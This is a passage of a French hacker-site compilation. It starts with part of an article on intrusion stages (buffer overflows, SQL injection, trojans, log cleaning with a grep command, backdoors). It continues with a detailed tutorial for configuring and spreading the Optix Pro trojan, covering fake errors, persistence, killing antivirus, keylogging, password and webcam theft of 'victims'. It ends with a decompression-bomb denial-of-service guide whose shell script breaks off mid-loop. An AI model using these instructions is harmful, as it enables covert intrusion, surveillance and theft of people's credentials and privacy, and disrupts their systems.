pour la diffusion restreinte d.exploits non publics donc plus efficaces (0-day).
La découverte et la correction de ce type de failles se fait le plus souvent par leur découverte par
des particuliers amateurs ainsi que dans les laboratoires de recherche de sociétés de sécurité,
ou par la découverte d.exploits circulant dans les milieux undergrounds18.
Les applications développées en interne, telles que les scripts CGI, sont aussi susceptibles
d.être affectées par de tels bugs, et l.analyse empirique de ces programmes est souvent
l.alternative la plus facile qu.il reste au pirate quand les failles connues sont corrigées.


5.2.1 Buffer overflows
La famille des buffer overflows a été décrite comme « faille de la décennie », et l.une des
premières utilisations connues de ces bugs a été le fameux « Morris Worm » qui paralysa
Internet fin 1988. C.est en fait une famille de failles, due à une erreur de code extrêmement
commune consistant à ne pas vérifier la taille de zones mémoire lors de la copie/lecture/. de
ces zones. En effet, de nombreux langages comme le C, pour des raisons d.optimisation et de
souplesse, ne vérifient pas les tailles des zones mémoires et laissent l.utilisateur libre d.accéder
à des octets hors des zones allouées : le programmeur se doit de vérifier lui-même qu.il ne tente
pas de lire ou d.écrire à des adresses non attribuées.
Les possibilités d.exploitation de ce problème sont nombreuses. En particulier, la technique des
buffer overflows la plus répandue consiste à utiliser la non-vérification des tailles de chaînes de
caractères d.un tableau à un autre pour écraser les octets qui suivent le tableau de destination
en mémoire. Le pirate, en exploitant une telle vulnérabilité, peut écraser des données
intéressantes en mémoire, telles que d.autres variables (un UID Unix sauvegardé, un nom de
fichier, .) et détourner le flux normal du programme. Une variable couramment écrasée pour
exploiter un programme vulnérable est l.adresse de retour des fonctions. Sur la plupart des
architectures et des compilateurs19, lors de l.appel à une fonction, l.adresse de retour de cette
fonction est stockée en mémoire dans la pile d.exécution du programme. Modifier cette valeur en
mémoire permet donc de contrôler où le programme sera aiguillé une fois la fonction terminée :
typiquement, le pirate détourne le flux du programme vers une zone mémoire contenant un
morceau de code dit shellcode, qui exécute une commande.

De telles failles dans les services réseaux tels que les serveurs de mail ou les serveurs
FTP/HTTP/. sont découvertes régulièrement et permettent de prendre le contrôle de la
machine affectée, en détournant le flux du serveur et lui faisant exécuter par exemple un shell.


18 à noter à ce propos la conférence de Marcus J. Ranum (NFR) au salon BlackHat 2000 : « Full
disclosure and Open Source » http://www.blackhat.com/html/bh-multi-media-archives.html
19 des attaques de type buffers overflows ont été démontrées pour quasiment toutes les plates-formes
actuelles.

Un des exemples les plus récents de buffer overflow a été celui découvert par Covert Labs de
Network Associates20 dans le serveur de noms Bind 8.2 d.ISC, permettant de prendre le contrôle
d.une machine par l.intermédiaire de Bind, et pour lequel des exploits circulent.


5.2.2 Attaques format string
Une nouvelle classe de failles récemment découverte (fin 1999) impliquent la modification
d.octets en mémoire par le biais de chaînes de formatage. Lorsqu.un programme écrit en C
génère un message contenant des variables (par exemple un message d.erreur destiné à être
affiché ou enregistré dans un fichier), il formate l.apparence de ce message par des caractères
spéciaux (formateurs) tels que %s, %d, .. Certains de ces caractères spéciaux (%n) permettent
d.écrire en mémoire. Si l.utilisateur peut injecter des formateurs dans le message, il peut
construire un message qui ira réécrire l.adresse de retour (comme dans le cas précédent des
buffer overflows) ou toute autre zone mémoire.
Ce type d.attaques implique la modification de variables en mémoire et est donc souvent
assimilé à la famille des buffer overflows.


5.2.3 Métacaractères shell et caractères spéciaux
De nombreux scripts CGI écrits en Perl ou en script shell Unix font appels à des commandes
externes Unix, comme par exemple /usr/bin/sendmail pour envoyer un mail. La ligne de
commande est potentiellement construite avec des paramètres rentrés par l.utilisateur dans le
formulaire. Si aucune vérification de cette entrée n.est effectuée (telle que, filtrer les caractères
non alphabétiques), des caractères spéciaux dits métacaractères peuvent être injectés pour
exécuter des commandes. Ces caractères spéciaux sont en particulier les séparateurs Unix tels
que ;, &, |, ( ), `, 0xff, ..
Par extension, ce type de faille affecte aussi les pages faisant appels à des bases de données.
L.insertion de caractères spéciaux SQL permet d.imbriquer une requête SQL dans la requête
construite à partir de l.entrée utilisateur :
L.instruction
SQL SELECT * FROM users WHERE user=’$form.user’ AND password=’$form.password’
devient
SELECT * FROM users WHERE user=’’ ; INSERT INTO users VALUES
(‘hacked’,’hacked’) ;’ AND password=’’


5.2.4 Virus, chevaux de Troie
Dans le cas d.une attaque directe inefficace, le pirate envoie un virus ou cheval de Troie à une
des adresses e-mail découvertes dans la phase de recherche environnementale. Cette attaque
nécessite l.acceptation du message par les filtres antivirus et l.exécution du programme par la
victime (même si certains clients mails comme Outlook ont eu des bugs permettant l.exécution
automatique de scripts à la réception du message ou à son ouverture).
L.agresseur, pour plus de fiabilité, développe son propre virus ou cheval de Troie. Il ne sera ainsi
pas reconnu par les antivirus à base de signatures. Le cheval de Troie récupère les mots de
passe et les envoie au pirate, ou établit une connexion à travers le firewall vers une machine
extérieure qu.il contrôle (technique de reverse-shell).
Un des exemples récents les plus connus de telles attaques est la compromission de l.intranet
Microsoft par une variante du virus QaZ, rendue publique en octobre 2000.

20 http://www.pgp.com/research/covert/advisories/047.asp


5.3 Elévation des privilèges
L.accès initial à une machine compromise par un pirate est souvent un accès non privilégié. Il
s.attache alors à élever ses privilèges vers les droits root sous Unix ou Administrateur sous
Windows NT.
Les techniques employées pour ce faire sont les mêmes que celles utilisées précédemment
pour gagner le premier accès. La méthode la plus courante est l.utilisation d.un buffer overflow
sur un programme local setuid root sous Unix, ou des permissions déficientes dans les fichiers
(C:) et la base des registres sous Windows NT.

6. Progression
Le pirate doit dans un premier temps nettoyer toute trace de son intrusion puis ensuite s.installer
pour revenir plus facilement sur le système compromis. Une fois la passerelle vers le système
d.information pénétré établie, il progresse rapidement ou lentement, furtivement, pour atteindre
le but qui le motive : vol d.informations, destruction de systèmes de production, ..
6.1 Inspection du système compromis
Les solutions de sécurisation des fichiers systèmes et journaux sont maintenant faciles à
déployer, et de nombreuses organisations ont recours à des systèmes de détection d.intrusion
dits « host-based » pour stopper à temps les pirates.

L.agresseur ayant gagné le contrôle d.une machine examine donc celle-ci afin d.y déceler tout
d.abord la présence d.un administrateur système qui pourrait noter le comportement suspect du
pirate. L.activité des utilisateurs eux-mêmes est aussi un bon moyen de se fondre dans le
système pour ne pas être repéré. Il utilise donc les utilitaires Unix standards tels que who,
whodo, last pour vérifier la fréquence de login des administrateurs, netstat pour inspecter
les éventuelles connexions non répertoriées dans les fichiers journaux, ..

Une fois le facteur humain éliminé, car c.est celui qui peut réagir le plus rapidement et qu.il est
impossible de modifier, il examine les processus actifs ainsi que le système de fichiers pour
trouver d.éventuels systèmes de surveillance ou IDS. Il utilise pour ce faire les outils standards
tels que ps, et examine les fichiers ouverts (avec l.utilitaire lsof) et les derniers fichiers
modifiés du disque, probablement des fichiers journaux ( /var/adm, /var/log, .). Il inspecte
les fichiers d.exécution programmée tels que crontab ou at afin de déterminer la fréquence
des backups et la potentialité que ses outils d.intrusion ou les fichiers journaux contenant des
traces aient été sauvegardés dans les backups précédents. Il détermine alors si des traces de
l.attaque ont été enregistrées et s.il lui est possible d.effacer ces traces sans en créer de
nouvelles (cas des systèmes de surveillance des fichiers comme Tripwire21). Il inspecte aussi les
configurations des systèmes de journaux tels que syslogd afin de voir une éventuelle copie
automatique des journaux vers d.autres machines (loghost dans /etc/hosts sous Unix). Les
sessions shell étant communément enregistrées pour des raisons de commodité (possibilité de
revenir à des commandes antérieures), il vérifie aussi que le shell qu.il utilise n.enregistre pas
d.historique (~/.bash_history, ~/.sh_history).


6.1.1 Nettoyage du système
Le pirate dispose alors d.une information précise sur les moyens de protection et de surveillance
en place sur la machine. Il décide alors s.il lui est possible de nettoyer les traces qu.il a laissé.
Ce nettoyage n.est en effet pas systématique car il peut introduire des traces beaucoup plus
importantes, notamment au niveau des systèmes de surveillance de fichiers comme Tripwire. Il
cherche cependant à nettoyer au maximum, en compromettant ces systèmes (modification des
bases de référence Tripwire si celles-ci sont stockées sur un support modifiable, ou backdoor
kernel comme nous le verrons dans la partie suivante).

L.enregistrement de session suivant montre un pirate nettoyant les traces de ses tentatives de
connexion sur le serveur ftp d.une machine Solaris qu.il a par la suite réussi à compromettre :

21 http://www.tripwire.com/


# cd /var/adm
# ls –l messages
-rw-r--r-- 1 root other 18244 Jan 7 12:29 messages
# tail –1 messages
Jan 7 12:29:52 solserv ftpd[10216]: bcomora (bogus) LOGIN FAILED [from
192.168.38.6]
# grep -v FAILED messages > .yo ; mv .yo messages


Il nettoie ensuite l.espace disque libre où les données de ses fichiers effacés sont toujours
présentes.

Si jamais le pirate ne peut pas effacer ses traces, il surveille régulièrement la machine afin de
déterminer si les administrateurs se sont aperçus de son intrusion et pouvoir l.évacuer
rapidement dans le cas positif.


6.1.2 Pose de backdoors
L.accès à un système par exploitation d.un des services est une tâche potentiellement difficile et
surtout bruyante. Le pirate se crée donc ensuite des portes détournées, dites backdoors, qui lui
permettront de revenir plus facilement sur le système.
Les backdoors peuvent être des plus simples (remplacement du programme de login par un
programme disposant d.un mot de passe générique) aux plus complexes, mettant en jeu des
modifications du système d.exploitation même, pouvant masquer jusqu.à la présence des
fichiers et des processus, voire de certains types de paquets réseau.

Les backdoors fréquemment utilisées sont :
- L.ajout de programmes d.apparence innocents introduisant des flux furtifs (« covert
channels ») dissimulant des commandes dans des flux standards (requêtes Web vers
l.extérieur, requêtes DNS ou ICMP, .).
- Des modifications de programmes tels que sshd, le serveur de connexions sécurisées
chiffrées. Le pirate installe une version modifiée du programme sshd qui lui permet de
revenir en se connectant sans trace, et avec une connexion chiffrée, évitant ainsi les IDS
réseau situés sur d.autres machines.
- L.insertion de modules kernels, normalement utilisés pour rajouter des pilotes
périphériques au vol, permet de modifier le noyau du système d.exploitation. Le pirate a
alors un contrôle complet sur le système, donc en particulier sur les logiciels de
surveillance, car ils font tous appels au système d.exploitation, censé être fiable.
Certaines backdoors kernel publiées récemment ont même la possibilité d.intercepter
des commandes envoyées par le pirate dans du trafic réseau bénin et de masquer ce
trafic aux sniffers en ne leur remontant pas les paquets22. Sur les systèmes ne disposant
pas de support des modules kernels, l.agresseur recompile un nouveau noyau
(/boot.img, /vmunix) ou modifie le noyau au vol par accès direct à la mémoire au
travers des fichiers /dev/mem, /dev/kmem ou /proc.


22 plaguez, .Weakening the Linux kernel., http://phrack.infonexus.com/search.phtml?view&article=p52-18


6.2 Prise d.information, progression
Suivant ce que le pirate cherche, il examine le comportement des utilisateurs afin d.identifier ses
prochaines cibles.
Il détermine le rôle de la machine sur laquelle il est par son nom, les fichiers qui y sont stockés,
le nombre et le type des utilisateurs. Il trouve les utilisateurs à suivre en regardant les fichiers de
mots de passe (/etc/passwd et /etc/group), où les attributions de chacun sont souvent
détaillées (par exemple : groupe des développeurs, groupe marketing, .).
Les fichiers de profil (/etc/profile, ~/.profile) des utilisateurs lui donnent des informations
intéressantes, comme par exemple les variables d.environnement des programmes tels que
CVS dans le cas de l.attaque d.un laboratoire de recherche. CVS ou ClearCase, largement
utilisés pour le contrôle des versions de projets, positionnent des variables d.environnement sur
le poste client donnant le nom des serveurs de développement où sont stockées les sources.
L.intrus cherche donc ces variables s.il s.attaque à des secrets industriels tels que des codes
sources. Il inspecte aussi les historiques des shells utilisateurs, pour déterminer vers quels
serveurs se connectent les développeurs.

Finalement, le pirate réitère autant de fois que nécessaire les phases d.exploitation et de
progression. Le rapatriement des informations capturées se fait par l.intermédiaire de backdoors
de type « covert channel » .



7. Conclusion
Nous avons vu le déroulement typique d.une attaque sur Internet : une phase de recherche
environnementale, où l.agresseur identifie sa cible, une phase de scanning, permettant de
trouver des services potentiellement exploitables, l'intrusion proprement dite puis finalement la
progression dans le système compromis. Les deux dernières phases sont ensuite reproduites
sur les systèmes internes, en se servant de la première machine capturée comme point de
départ. Cet exemple de déroulement, que l.on peut qualifier de tactique empirique, est valable
quelle que soit la motivation du pirate et ses compétences : seuls les moyens mis en oeuvre et le
raffinement technique des méthodes vont varier. L.établissement de lignes de défense adaptées
passe par la compréhension de ces mécanismes, en particulier en ce qui concerne la détection
des intrusions et la récupération d.un système après un incident.Nous avons fait un pas en avant pour comprendre comment les pirates opéraient, il reste à voir pour très bientot l'utilisation d'outils spécifique afin de mener à bien cette intrusion

Tutos

Tutos optix pro

1-Intro
2- créer un serveur
2.1 Main Setting
2.2 Startup & Installation
2.3 Notification
2.4 Firewall & AVS Evasion
2.5 Enhanced Options
3- utiliser le client (traduction des fonctions)

---
1- Intro
---

Optix Pro est un "trojan" (aussi appelé Backdoor, cheval de Troie, troyen, trojan horse...) et est utilisé pour contrôler un ordinateur à distance via l'internet. Il doit être utilisé par quelqu'un qui désire contrôler ce qui se passe sur son propre ordinateur lorsqu'il est absent. Si vous l'utilisé d'une autre manière (en installant le fichier serveur sur un ordinateur dont vous n'êtes pas le propriétaire, par exemple) vous pourriez vous attiré de gros ennuis parce que c'est illégal dans la 'plupart' des pays. En aucun cas l'auteur de ce texte ne pourra être tenu responsable de votre choix d'agir dans l'illégalité.

 


Pour prendre contrôle d'un ordinateur avec Optix Pro 1.3, on doit d'abord créer un fichier serveur qui devra ensuite être exécuté sur l'ordinateur cible. Ce serveur est un petit programme qui se cache dans l'ordinateur, une fois exécuté, et qui redémarre avec Windows. Le serveur est la partie essentielle du trojan; c'est lui qui exécute toutes les commandes voulues sur l'ordinateur cible (victime), par exemple en nous envoyant des captures d'écran ou de clavier ou alors en nous permettant de parcourir les fichiers de l'ordinateur cible. C'est également lui qui nous envoi une "notify", un message transféré par internet qui nous permet de garder la trace de la 'victime' a chaque fois qu'elle se connecte a internet.

Il faut donc créé un fichier serveur pour pouvoir utiliser Optix Pro. Pour ce faire, on utilise le programme builder.exe ; le builder est un "éditeur de serveur", il nous permet de créer un serveur personnalisé.

On utilise ensuite le fichier Client.exe pour connecter et contrôler l'ordinateur 'victime'. Le Client est la partie du programme qui nous permet d'envoyer nos instructions au serveur.

Le fichier serveur peut être envoyé par email, icq, irc etc. ou tout simplement être installé a partir d'une disquette ou d'un CD; il s'installe comme tous les programmes, c'est à dire en l'exécutant. Il est compatible avec la plupart des systèmes Windows (95/98/ME/NT/2000/XP)
En résumé:
Client.exe --) permet de contrôler l'ordinateur 'victime'
Builder.exe --) permet de créer un Server.exe personnalisé
server.exe --) doit être installé sur l'ordinateur 'victime' pour que le Client.exe puisse se connecté et contrôler cet ordinateur
---
2- créer un serveur personnalisé
---
Apres avoir downloader Optix pro 1.3, on ouvre le fichier Builder.exe afin de créé un server personnalisé.

2.1 Main Setting

Ensuite, on ouvre la section "main settings" et on clic sur "general Information". Plusieurs options s'offre alors à nous. Il est à noter que les options par défaut sont fonctionnelles. Il est inutile de changer quoi que ce soit sans raison, surtout si vous ne savez pas ce que vous faites. Dans ce texte, je vais expliquez la signification de chaque fonction une à une.
La section "notification string separators" permet de déterminer quel symbole sera utiliser par le serveur pour nous envoyer l'adresse IP de la victime par ICQ (ICQ notify). En effet, Optix Pro peut utiliser ICQ ( www.icq.com ) pour vous envoyer un avertissement a chaque fois que la victime est en ligne. ICQ utilise des filtres pour bloquer les messages envoyer par les trojans et Optix Pro permet de contourner ce problème en offrant a l'utilisateur la possibilité de configurer complètement le message ICQ qui sera envoyer. Au moment d'écrire ce texte, le symbole par défaut de la case "notification string separators" fonctionne. N'utilisé pas un point (.) pour le "ip adress separators", ICQ détecte les IPs sous ce format. Les deux symboles par défaut sont fonctionnels.

[n00bs Infos] L?adresse « IP », qui signifie simplement « Internet Protocol », permet d?identifier chaque ordinateur relié à Internet. À chaque connections internet, un ordinateur se voit attribué une IP. Elle est essentiel pour connecter l?ordinateur ?victime?, c?est elle qui permet au client de rejoindre le serveur. En gros, pas d?IP, pas de connections [/n00bs Infos]

Dans la section "Identification name", entrez un nom qui vous rappellera quel est le PC serveur (victime), par exemple le nick de la personne visée, son nom etc.

On doit d'abord choisir un port pour la section "Server Port". (Le port par default est 3410 et fonctionne bien) Inscrivez simplement un chiffre entre 1000 et 65000, ces ports ne sont généralement pas utilisés par Windows

On coche ensuite la case "Server password" et on choisit un mot de passe qui va être demandé lors de la connexion au server (afin d'éviter qu'un indésirable connecte le serveur). On re-tape ce mot de passe dans la section "confirmation (re-type)"

La section "Fake error" permet d'afficher un faux message d'erreur lors de l'exécution du server. De cette façon, on peut faire croire à celui qui installe le serveur que quelque chose n'a pas fonctionné tandis que le serveur s'installe tres bien "par en arrière"

Voici quelques exemples de faux message:

"cant load image file"
"Ce programme va s'arrêter car il a effectué une opération non conforme"
"image file is corrupted i/o error 54546"
"Le fichier dsapi.dll est introuvable"
etc. etc.
On passe ensuite à la section "Server Icon" pour choisir quelle icône le serveur se verra attribuée. On doit choisir cette icône en fonction de ce pourquoi on va faire passer le serveur. Si on prétend que le serveur est une image, il faut donc choisir l'icône approprié etc.
2.2 Startup & Installation

On passe ensuite à la section "Startup & Installation" et on clic ensuite sur « StartUp » On doit y choisir au moins une "StartUp method" pour que le serveur soit exécuté par Windows a chaque redémarrage de l'ordinateur.

[n00bs Infos] Lorsqu?un trojan est installé, on doit s?assurer qu?il va redémarrer avec Windows. De cette façon, on a pas a réinfecté la machine a chaque fois que l?utilisateur relance son système ! Comme n?importe quel programme qui se lance automatiquement avec Windows (par exemple MSN Messenger, les Anti-Virus et Firewall qui « ouvre tout seul » etc.), le trojan va utiliser des « startup Method » pour se relancer avec Windows
[/n00bs Infos]

Optix Pro offre 5 Startups Method. Je vous conseil d?utiliser les 4 premières, la cinquième étant parfois dommageable. Utilisez absolument la méthode « Registry RunService » si vous croyez que le serveur sera installé sous un système NT/2000/XP

On clic ensuite sur la section « file setup » pour choisir si le serveur va s'installé dans le dossier /windows/ ou /system/ et choisir un nom pour le serveur (Server File Name) par exemple windows.exe, winload.exe, system.exe...

La fonction "melt server after installation", si elle est sélectionnée, va auto-détruire le fichier server d'origine après l'installation (le serveur demeure fonctionnel puisqu'il s?est copier dans /windows/ ou /system/ selon ce que vous avez choisi)

2.3 Notification

On passe ensuite à la page "Notification". La notification, ou notify, c?est le message que le serveur vous envoi a chaque fois que l?ordi victime se connecte a internet. Il contien les informations essentielles pour se connecter : l?IP, le port et le password.

La section « ICQ Notification » permet de taper son UIN (numéro ICQ) pour recevoir un pager a chaque fois que le serveur connecte l'internet. C'est la méthode la plus utilisée. Il s?uffit de cliquer sur « ADD NEW » pour ajouter autant de numéro ICQ que l?on veut.

La section CGI permet de se faire notifier par un script CGI hébergé sur un web server
Optix Pro utilise le logger CGI disponible a
http://www.bfndevelopment.com/ (documentation incluse). Voir le fichier cgilogger.zip. Cette méthode nécessite un hébergeur web qui accepte d?exécuter des scripts CGI, par exemple netfirms.com (gratuit)
Le MSN notify permet de recevoir la notification par MSN (duh!). Pour se faire, vous aurez besoin de 2 comptes MSN, un pour envoyer la notify (invisiblement, à partir du PC serveur) et un pour la recevoir (votre compte ordinaire). Pour activer cette fonction, on clique sur « ADD NEW ». La fenetre « Send To » apparaît, taper alors votre adresse hotmail correspondant au compte pour recevoir la notification. On clic ensuite OK. La fenetre « send From » apparaît, on y tape l?adresse email du deuxième compte, celui qui va être utilisé pour envoyer la notification à partir du PC serveur. On clic ensuite sur OK. La fenetre « Send From Password » apparaît. On tape le mot de passe du deuxième compte MSN, celui qu?on vient de remplir. Le PC serveur a besoin du mot de passe pour se connecter a MSN et envoyer la notification. On clic ensuite sur OK.
La section IRC Notification permet de recevoir une notification par miRC par exemple. Entrez simplement les coordonnés de votre server/port/channel irc préféré apres avoir cliqué sur « ADD NEW ». Pour plus d?information sur l?IRC, visitez
http://www.mirc.com/irc.html (en anglais)

Le PHP Notify fonctionne comme le CGI Notify, mais l?hébergeur doir accepter les script PHP. Le script est aussi inclut, voir phplogger.zip

Le SMTP notify permet de recevoir un rapport (notify) par email à chaque fois que le server connect l'internet. Si vous ne connaissé pas de serveur SMTP Open Relay, vous devrez essayer de trouver quel est le serveur SMTP du fournisseur Internet de la future victime. Utilisez l?aide technique en ligne du fournisseur Internet (aides aux abonnés), vous y trouverez certainement le serveur SMTP.

[n00bs Infos] Un serveur SMTP, c?est un programme qui gère l?envoi de email. En général, on ne peut utiliser les SMTP, à moins d?être un utilisateur légitime. Par exemple, on peut utiliser le SMTP de notre fournisseur Internet pour envoyer des emails avec Outlook, Eudora etc., mais on ne peut utiliser le SMTP des autres fournisseurs Internet. Le trojan ne peut donc utiliser votre SMTP, il doit utiliser celui du fournisseur internet du PC serveur. Pour retracer le fournisseur internet de quelqu?un à partir de son IP, il est possible d?utiliser des outils en ligne comme www.samspade.org . Les serveur SMTP que l?on dit « Open Relay », pour leur par, accepte les connections peut importe l?origine. Ils peuvent donc être utilisé par un trojan. Malheureusement, ces SMTP disparaissent rapidement vu l?abus qu?en font les spammers [/n00bs Infos]

2.4 Firewall & AVS Evasion

La section "Firewall/Avs Evasion" permet d'éliminer les Anti-Virus et Firewall sur le PC server. La liste des programmes supportées est annexé a Optix Pro dans le fichier FirewallsAVS.txt.

Sélectionné « Enable killing Of in-built Firewalls » si vous ne voulez pas que les firewalls fonctionnent sur le PC serveur.

Sélectionné « Enable killing Of in-built Anti-viruses » si vous ne voulez pas que les Anti-Virus fonctionnent sur le PC serveur.

Sélectionné « Enable killing Of in-built Package » si vous ne voulez pas que des combos firewalls / anti-virus fonctionnent sur le PC serveur.

Vous pouvez aussi ajouter des programmes (exemple: netstat.exe, regedit.exe, regedit32.exe...) dans la section « Specific .EXE » et des services windows dans la section « NT/2K/XP Service »

2.5 Enhanced Options

Finalement, la section Enhanced Options offre des options de camouflage supplémentaire (serveur exe name et clé du registre) si vous considérez piéger un utilisateur très avancé, cette option pourrait être essentielle. Par contre, elle est nouvelle dans le monde des trojans, donc peut-être pas stable a 100%

Losque vos options sont toutes bien en place, cliqué sur "Build/Create Server" en haut du Builder. Il ne vous restes qu?a donner un nom à votre serveur et à l?enregistrer. Il est maintenant prêt a être installé. Il peut être renommé a condition qu'il conserve une extension exécutable (.exe, .com, .bat, .pif...). Conserver l?extension .exe pour ne pas perdre l?icône choisie. Il peut aussi être compressé (packed) ce qui permet de reduire la taille du server de moitié... Des programmes de compression peuvent être téléchargés de
Illcommunity.com
exetools.com
qwerto.cjb.net
etc.

Personnellement j?utilise UPX , masi les n00b préfererons peut-etre TElock qui est tres simple d?utilisation. Cette étape n?est pas essentielle.

Votre serveur est donc prêt a être installé. Vous pouvez maintenant l?envoyer à tout vos amis par email en pièce jointe, par DCC sur IRC, par transfert de fichier sur MSN, AIM etc. ou simplement le mettre sur une disquette ou un CD et l?exécuter sur l?ordinateur cible. Ensuite il ne vous reste qu?a attendre la notification choisie pour connetre l?IP du PC serveur, pour pouvoir enfin vous connecter et utiliser le Client.exe

---
3- utiliser le client (traduction des fonctions)
---
Client Sock --) Permet d?utiliser un serveur proxy pour être plus anonyme. A réserver aux paranoïaques.

Server Option--) Power operation --) Logoff/reboot/shut down/power off
permet de fermer ou rebooté windows

Server Option --) Power operation --) Blue Screen
écran bleue ( unrecoverable = irrécupérable ;)

Server Option --) Server Operation
Permet d'obtenir des info sur les options du server (get)
Closer server file = ferme le fichier server
Restart server file = redémare le fichier server
Remove server = Désinstalle le server (vous ne pourrez plus connecté)

Managers --) File Manager
pour se promener sur le c: de la victime ou tout autre partition
On optient d'abord les partitions en cliquand sur "Get Drives"
en cliquant de la droite sur un fichier, une liste d'options apparaient (download, delete...)
Managers --) Process Manager
Permet de listé et de tué les programmes actif sur le pc server

Managers --) Window Manager
Permet de listé et de tué les fenetres activent sur le pc server
"Change title" permet de renommé une fenetre

Managers --) Registry Manager
Permet de manipuler le registre (utilisateur avancé)

Managers --) FTP Manager
Permet d?ouvrir un serveur FTP sur le PC serveur avec port et password configurable. Parfais pour les Warez d00ds.

Managers --) SOCKS server
Permet d?ouvrir un serveur proxy sur le PC serveur.

[n00bs Infos] Un serveur Proxy permet d?être anonyme sur internet. Dans le cas d?Optix Pro, il vous permet d?utiliser l?IP du PC serveur pour surfer sur le web, vous connecter sur IRC etc. Les utilisateurs d?internet explorer peuvent ajouter un serveur proxy dans la menu
Outils --) options internet ?) connexion --) paramètres
Les utilisateurs de mIRC32 peuvent ajouter un proxy dans la section « Firewall » du menu « Connect ». Le serveur proxy agit comme une passerelle pour cacher votre IP
Vous --) votre fournisseur internet --) serveur proxy --) destination (site web, chan irc?)
[/n00bs Infos]

Managers --) Remote scanner
Permet de scanner une rangée d?IP à partir du PC serveur, pour trouver d?autres trojans ou des vulnérabilités. C?est l?IP du PC serveur qui apparaîtra dans la traînée de logs qui suit chaque scan ;)

Managers --) Port Redirect
Voir le tutorial concernant le port redirection a www.qwerto.cjb.net

Communication --) Message box
Permet de faire apparaître un faux message d'erreur sur le PC serveur
La case "test message" permet de testé le message sur vous même

Communication --) Matrix Chat
Chat avec la victime (server)
seul le client peut fermé le chat

Communication --) Client-2-Client Chat
Permet de « chatter » avec tous les clients connecté ! Change votre victime en serveur de chat perso (invisible pour la victime)

Spy Tools --) computer information
Permet de connaître le hardware du PC serveur etc.

Spy Tools --) Get Password
Vole des mots de passes
cached = enregistré (win 9x seulement)
AIM = AOL Instant Messenger
RAS = Connection(s) Internet (modem/ADSL) (Remote Acces Service)

Spy Tool --) Key Logger
Permet de voir en direct tout ce qui est tapé par la victime, ainsi que dans quelle fenetre cela est tapé. On clic sur "enable" pour démarré le key logger

PC Manipulation --) Screen / Mouse
Permet de faire des capture d?écran du PC serveur et de contrôler la sourie. Les captures peuvent être sauvegarder en format jpg

PC Manipulation --) Keyboard
Manipulation avancée du clavier, pour envoyer des frappes a la place du pc serveur. Idéal pour détruire une session de « chat » et pour briser des couples.

PC Manipulation --) Cam Capture
Permet de faire des captures à partir de la webcam de votre victime (pour voir sa tête)

PC Manipulation --) Send Keys (old)
Permet d'écrire à la place du serveur dans une fenetre donnée
le caractère | = [Enter]

Humor / Fun Stuff --) Originals
les fonctions habituelles
SHOW/HIDE START BUTTON: montre/cache le boutton "démarrer"
OPEN/CLOSE CD ROM: open/close cd-rom bordel!!! :)
SHOW/HIDE CLOCK: montre/cache l'horloge
Beep pc speeker 200x: envoit un son stridant et continu par les haut-parleurs
SHOW/HIDE TASK BAR: montre/cache la bar de tache
MONITOR ON/OFF: moniteur on/off
etc...

Humor / Fun Stuff --) Screen Printer
Permet de faire afficher des textes et couleurs ennuyants sur l?écran de la victime. Par exemple : « QwErTo ownz u »

Denis

Les denis de service par « decompression bomb’s »

 L’idée de base est simple mais il fallait y penser. La plupart des antivirus modernes on la capacité d’analyser des fichiers compressés avec une occurrence (zip dans un zip dans un zip poupées russes quoi) plus ou moins longue. En effet, ils permettent de dézipper plusieurs fois une archive afin de vérifier si les fichiers présents dans ces archives sont infectés. Ces opérations s’effectuent soit dans un espace temporaire dédié soit par le biais de la mémoire virtuelle (swap). L’idée est de créer un fichier zip de quelques kilos qui une fois dézippé dans son intégralité représente plusieurs pétaoctets de données et donc sature l’espace disque dédié ainsi que la charge du microprocesseur créant ainsi un déni de service (dos). Mais comment cela est-il possible ?


C’est très simple il suffit de créer un fichier rempli de zéro (ou autre caractère identiques) de plusieurs centaines de mégaoctets de le zipper. Les caractères étant répétitifs le résultat obtient un excellent taux de compression, par exemple un fichier de 4G0 rempli de zéro compressé avec le taux le plus élevé correspond à une archive zip de 4070k0 ce fichier est copié plusieurs fois puis les fichiers obtenus sont compressés a leur tour dans une archive zip. Cette opération est répété plusieurs fois de suite jusqu’à n’obtenir qu’une archive de quelques dizaine de kilo (en fait au bout de trois occurrence la taille ne diminue plus elle augmente légèrement mais la taille globale de l’archive elle augmente considérablement).

J’ai fais l’essai sous linux en shell script cela m’a pris cinq minutes pour créer le script et le résultat était surprenant.

Petit détail pour plus de compréhension

16 fichier zip de 4Mo correspondant à 4Go de zéro chacun zippés dans une seule archive qui ne fait plus que 161 Ko ce fichier est a sont tour copié 16 fois et zippé dans une archive qui ne fais que quelques centaines de 32Ko cet opération est répété 4 fois et on obtient un fichier zip de 53Ko environ. Il y a en tout 5 occurrences, donc la somme des fichiers et la somme de (16 puissance n) avec n allant de 1 à 6 donc pas moins de 17895696 fichiers. La taille totale de cette archive décompressée est de 76861429059158016 octets soit 68 pétaoctets environ.

Petit shémas pour enfoncer le clou :

4Go de zéros ->compressés->fermion0.dll -
4Go de zéros ->compressés->fermion1.dll |
4Go de zéros ->compressés->fermion2.dll |
4Go de zéros ->compressés->fermion3.dll |
4Go de zéros ->compressés->fermion4.dll |
4Go de zéros ->compressés->fermion5.dll |
4Go de zéros ->compressés->fermion6.dll |
4Go de zéros ->compressés->fermion7.dll | --> compressés --> quark(0 à f).dll --> compressés --> proton(0 à f).zip --
4Go de zéros ->compressés->fermion8.dll |
4Go de zéros ->compressés->fermion9.dll |
4Go de zéros ->compressés->fermiona.dll |
4Go de zéros ->compressés->fermionb.dll |
4Go de zéros ->compressés->fermionc.dll |
4Go de zéros ->compressés->fermiond.dll |
4Go de zéros ->compressés->fermione.dll |
4Go de zéros ->compressés->fermionf.dll –

--> compressé --> atome(0 à f).zip --> compressés --> molecule(0 à f).zip --> compressés --> adn(0 à f).zip --> compressés
--> surprise_inside.zip

voici le petit script qui permet de concevoir une tel merveille. Pour l’exécuter il faut bien sur être sous linux il faut que les exécutables gzip, zip, dd, et awk soient présents sinon installer les paquetages correspondants. Il faut bien sur donner le droit en exécution au script et un dernier petit conseil il faut être sur une partition ext2 ou 3, car j’ai fait l’essai sur une partition dos et le résultat ne faisait plus 53Ko mais 400 ko, ceci est sûrement du à la gestion des clusters de FAT. Il faut peu d’espace disque pour l’exécuter car les 4G0 sont crées à la volée et non sur le disque donc la taille minimum de libre pour pouvoir l’exécuter doit être de 16 x 4Mo (64Mo taille des fichiers de la première occurrence).

#!/bin/sh
clear
echo "création du fichier référence"
dd if=/dev/zero bs=1M count=4096 2>/dev/null | gzip -9 >fermion0.dll
echo "copie de ce fichier 15 fois"
i=1
while [ $i -le 9 ]
do
